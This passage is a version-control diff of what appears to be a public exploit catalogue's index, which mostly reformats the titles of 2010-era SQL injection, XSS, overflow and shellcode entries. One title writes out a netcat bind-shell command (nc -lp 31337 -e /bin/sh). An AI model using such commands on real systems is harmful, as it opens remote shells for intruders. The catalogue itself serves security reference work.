+13814,platforms/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0 13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - .INDD File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 @@ -12216,8 +12216,8 @@ id,file,description,date,author,platform,type,port 13861,platforms/asp/webapps/13861.txt,"Real-time ASP Calendar SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 13862,platforms/php/webapps/13862.txt,"Pre Classified Listing - SQL",2010-06-13,"L0rd CrusAd3r",php,webapps,0 13863,platforms/php/webapps/13863.txt,"Lyrics Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0 -13864,platforms/php/webapps/13864.txt,"Membership Site Script SQL Injection",2010-06-14,Valentin,php,webapps,0 -13865,platforms/php/webapps/13865.txt,"Daily Inspirational Quotes Script SQL Injection",2010-06-14,Valentin,php,webapps,0 +13864,platforms/php/webapps/13864.txt,"Membership Site Script - SQL Injection",2010-06-14,Valentin,php,webapps,0 +13865,platforms/php/webapps/13865.txt,"Daily Inspirational Quotes Script - SQL Injection",2010-06-14,Valentin,php,webapps,0 13866,platforms/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0 13867,platforms/php/webapps/13867.txt,"E-Book Store SQL Injection",2010-06-14,Valentin,php,webapps,0 13870,platforms/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",ios,dos,0 @@ -12268,8 +12268,8 @@ id,file,description,date,author,platform,type,port 13925,platforms/php/webapps/13925.txt,"joomla component ozio gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13926,platforms/php/webapps/13926.txt,"joomla component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13927,platforms/php/webapps/13927.txt,"MarketSaz Remote file Upload",2010-06-18,NetQurd,php,webapps,0 -13929,platforms/php/webapps/13929.txt,"Banner Management Script SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 +13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 +13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13931,platforms/php/webapps/13931.txt,"Kubelance SQL Injection - (profile.php?id)",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 13933,platforms/php/webapps/13933.txt,"UK One Media CMS (id) Error Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0 @@ -12285,10 +12285,10 @@ id,file,description,date,author,platform,type,port 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 13944,platforms/php/webapps/13944.txt,"SimpleAssets Authentication Bypass / XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13945,platforms/php/webapps/13945.txt,"iBoutique (page) SQL Injection and XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 -13946,platforms/php/webapps/13946.txt,"Overstock Script SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 -13947,platforms/php/webapps/13947.txt,"PHP Calendars Script SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13946,platforms/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13948,platforms/php/webapps/13948.txt,"OroHYIP SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 -13949,platforms/php/webapps/13949.txt,"Shareasale Script SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13949,platforms/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13951,platforms/php/webapps/13951.txt,"Joomla Component com_eportfolio - Upload",2010-06-20,Sid3^effects,php,webapps,0 13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - (news.php) SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 13954,platforms/php/webapps/13954.txt,"G.CMS Generator SQL Injection",2010-06-21,Sid3^effects,php,webapps,0 @@ -12307,24 +12307,24 @@ id,file,description,date,author,platform,type,port 13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH PoC",2010-06-22,blake,windows,dos,0 13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps,0 13967,platforms/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / XSS",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13969,platforms/php/webapps/13969.txt,"Job Search Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13969,platforms/php/webapps/13969.txt,"Job Search Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13970,platforms/php/webapps/13970.txt,"Video Community portal - SQLi / XSS",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13971,platforms/php/webapps/13971.txt,"Classifieds Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13973,platforms/php/webapps/13973.txt,"Hot or Not Picture Rating Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13975,platforms/php/webapps/13975.txt,"Webring Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13976,platforms/php/webapps/13976.txt,"Top Sites Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13977,platforms/php/webapps/13977.txt,"Social Community Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13978,platforms/php/webapps/13978.txt,"Job Search Engine Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13971,platforms/php/webapps/13971.txt,"Classifieds Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13973,platforms/php/webapps/13973.txt,"Hot or Not Picture Rating Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13975,platforms/php/webapps/13975.txt,"Webring Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13976,platforms/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13977,platforms/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13978,platforms/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13979,platforms/php/webapps/13979.txt,"Joomla Component com_ybggal 1.0 - (catid) SQL Injection",2010-06-22,v3n0m,php,webapps,0 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0 13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery - LFI",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS - (e4700.asp?id) SQL Injection",2010-06-22,CoBRa_21,php,webapps,0 13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0 -13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 +13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13987,platforms/php/webapps/13987.txt,"Pre Multi-Vendor Shopping Malls SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13988,platforms/php/webapps/13988.txt,"PHP Event Calendar 1.5 - Multiple Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 -13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 +13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13993,platforms/php/webapps/13993.txt,"k-search - (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection",2010-07-31,gendenk,php,webapps,0 @@ -12339,7 +12339,7 @@ id,file,description,date,author,platform,type,port 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload / Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2DayBiz MLM Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 -14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL Injection",2010-06-23,JaMbA,php,webapps,0 +14007,platforms/php/webapps/14007.txt,"Custom Business Card script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14008,platforms/php/webapps/14008.txt,"2DayBiz matrimonial Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14009,platforms/php/webapps/14009.txt,"2DayBiz Freelance Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 @@ -12359,7 +12359,7 @@ id,file,description,date,author,platform,type,port 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14030,platforms/asp/webapps/14030.pl,"phportal_1.2 - (gunaysoft.php) Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats - (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 -14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI",2010-06-24,"Zer0 Thunder",php,webapps,0 +14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v - Arbitrary File Upload & LFI",2010-06-24,"Zer0 Thunder",php,webapps,0 14035,platforms/php/webapps/14035.txt,"Big Forum SQL Injection - (forum.php?id)",2010-06-24,JaMbA,php,webapps,0 14036,platforms/windows/dos/14036.pl,"Geomau 7 - (.wg2) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14037,platforms/windows/dos/14037.pl,"Plotwn 18 - (.wp2) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 @@ -12372,7 +12372,7 @@ id,file,description,date,author,platform,type,port 14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / XSS",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2daybiz B2B Portal Script - (selling_buy_leads1.php) SQL Injection",2010-06-25,r45c4l,php,webapps,0 14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0 -14053,platforms/php/webapps/14053.txt,"snipe gallery Script SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 +14053,platforms/php/webapps/14053.txt,"snipe gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 @@ -12397,7 +12397,7 @@ id,file,description,date,author,platform,type,port 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow Exploit (Metasploit)",2010-06-27,blake,windows,local,0 14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload 1.09 - Remote Shell Upload",2010-06-27,Mr.Benladen,php,webapps,0 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 -14080,platforms/php/webapps/14080.txt,"I-Net MLM Script Engine SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 +14080,platforms/php/webapps/14080.txt,"I-Net MLM Script Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0 14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection",2010-06-27,"L0rd CrusAd3r",php,webapps,0 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 @@ -12407,7 +12407,7 @@ id,file,description,date,author,platform,type,port 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQLi",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQLi",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - CSRF",2010-06-28,"ADEO Security",php,webapps,0 -14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0Day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 +14295,platforms/windows/dos/14295.html,"Microsoft - MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0Day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote DoS",2010-06-28,Markot,windows,dos,80 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 @@ -12416,7 +12416,7 @@ id,file,description,date,author,platform,type,port 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender 4.01-3 - Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80 -14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script (docID) SQL Injection",2010-06-29,v3n0m,php,webapps,0 +14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script - (docID) SQL Injection",2010-06-29,v3n0m,php,webapps,0 14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - CSRF (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0 14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - CSRF (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - (result.php) SQL Injection",2010-06-29,v3n0m,php,webapps,0 @@ -12466,7 +12466,7 @@ id,file,description,date,author,platform,type,port 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - (.mp3) Local Stack Overflow PoC",2010-07-02,v3n0m,windows,dos,0 14183,platforms/php/webapps/14183.txt,"Joomla Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0 14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 -14180,platforms/windows/remote/14180.py,"HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14180,platforms/windows/remote/14180.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 @@ -12506,16 +12506,16 @@ id,file,description,date,author,platform,type,port 14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory SQL Injection/Auth Bypass",2010-07-05,Sid3^effects,php,webapps,0 -14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script SQL Injection/Auth Bypass",2010-07-05,Sid3^effects,php,webapps,0 -14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 -14226,platforms/php/webapps/14226.txt,"Bs Home_Classifieds Script SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 -14227,platforms/php/webapps/14227.txt,"Bs Events_Locator Script SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 -14228,platforms/php/webapps/14228.txt,"Bs General_Classifieds Script SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 +14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection/Auth Bypass",2010-07-05,Sid3^effects,php,webapps,0 +14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 +14226,platforms/php/webapps/14226.txt,"Bs Home_Classifieds Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 +14227,platforms/php/webapps/14227.txt,"Bs Events_Locator Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 +14228,platforms/php/webapps/14228.txt,"Bs General_Classifieds Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - (articlesdetails.php) SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 -14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script SQL Injection/Auth Bypass",2010-07-05,Sid3^effects,php,webapps,0 +14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection/Auth Bypass",2010-07-05,Sid3^effects,php,webapps,0 33410,platforms/php/webapps/33410.txt,"Drupal Sections 5.x-1.2/6.x-1.2 Module - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0 -14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 +14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800 14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 @@ -12528,7 +12528,7 @@ id,file,description,date,author,platform,type,port 14243,platforms/php/webapps/14243.txt,"BS Events Directory - (articlesdetails.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection / Auth Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 -14248,platforms/windows/remote/14248.py,"minerCPP 0.4b Remote BOF+Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 +14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote BOF / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQLi",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 14254,platforms/osx/remote/14254.py,"EvoCam Web Server OS X ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 @@ -12581,7 +12581,7 @@ id,file,description,date,author,platform,type,port 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Upload",2010-07-10,Sid3^effects,php,webapps,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent XSS",2010-07-12,Sid3^effects,php,webapps,0 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 -14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 +14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 @@ -12602,13 +12602,13 @@ id,file,description,date,author,platform,type,port 14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - (shw) Buffer Preoccupation PoC",2010-07-12,LiquidWorm,windows,dos,0 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) - SQL Injection",2010-07-13,_mlk_,php,webapps,0 14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 -14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection",2010-07-13,D4rk357,php,webapps,0 +14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)",2010-07-13,Node,windows,local,0 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 -14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS",2010-07-13,Sid3^effects,php,webapps,0 +14354,platforms/php/webapps/14354.txt,"AJ Article - Persistent XSS",2010-07-13,Sid3^effects,php,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS Persistent XSS",2010-07-13,Sid3^effects,php,webapps,0 14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication bypass",2010-07-14,D4rk357,php,webapps,0 -14361,platforms/windows/local/14361.py,"Microsoft Excel 0x5D record Stack Overflow",2010-07-14,webDEViL,windows,local,0 +14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow",2010-07-14,webDEViL,windows,local,0 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS Remote Persistent XSS",2010-07-15,D4rk357,php,webapps,0 14366,platforms/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps,0 @@ -12626,7 +12626,7 @@ id,file,description,date,author,platform,type,port 14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 14380,platforms/windows/dos/14380.py,"Power/Personal FTP Server RETR Denial of Service",2010-07-16,antrhacks,windows,dos,0 14381,platforms/php/webapps/14381.txt,"Group Office Remote Command Execution",2010-07-16,"ADEO Security",php,webapps,0 -14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA CSRF",2010-07-16,Markot,windows,webapps,0 +14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA - CSRF",2010-07-16,Markot,windows,webapps,0 14383,platforms/php/webapps/14383.txt,"Group Office - (comment_id) SQL Injection",2010-07-16,"Canberk BOLAT",php,webapps,0 14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection",2010-07-20,v0calist,asp,webapps,0 14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection",2010-07-20,CoBRa_21,asp,webapps,0 @@ -12634,8 +12634,8 @@ id,file,description,date,author,platform,type,port 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14387,platforms/multiple/remote/14387.html,"Safari Browser 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 -14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script Persistent XSS",2010-07-17,Sid3^effects,php,webapps,0 -14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script Upload",2010-07-17,Sid3^effects,php,webapps,0 +14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent XSS",2010-07-17,Sid3^effects,php,webapps,0 +14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script - Upload",2010-07-17,Sid3^effects,php,webapps,0 14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds Persistent XSS",2010-07-17,Sid3^effects,php,webapps,0 14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps,0 14393,platforms/php/webapps/14393.txt,"Calendarix - (cal_cat.php) SQL Injection",2010-07-17,SixP4ck3r,php,webapps,0 @@ -12659,7 +12659,7 @@ id,file,description,date,author,platform,type,port 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 -14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script SQL Injection",2010-07-20,v0calist,asp,webapps,0 +14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,asp,webapps,0 14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 14423,platforms/php/webapps/14423.txt,"Joomla Component com_spa - SQL Injection",2010-07-20,"ALTBTA ",php,webapps,0 14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos,0 @@ -12690,7 +12690,7 @@ id,file,description,date,author,platform,type,port 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 -14454,platforms/php/webapps/14454.txt,"ValidForm Builder script Remote Command 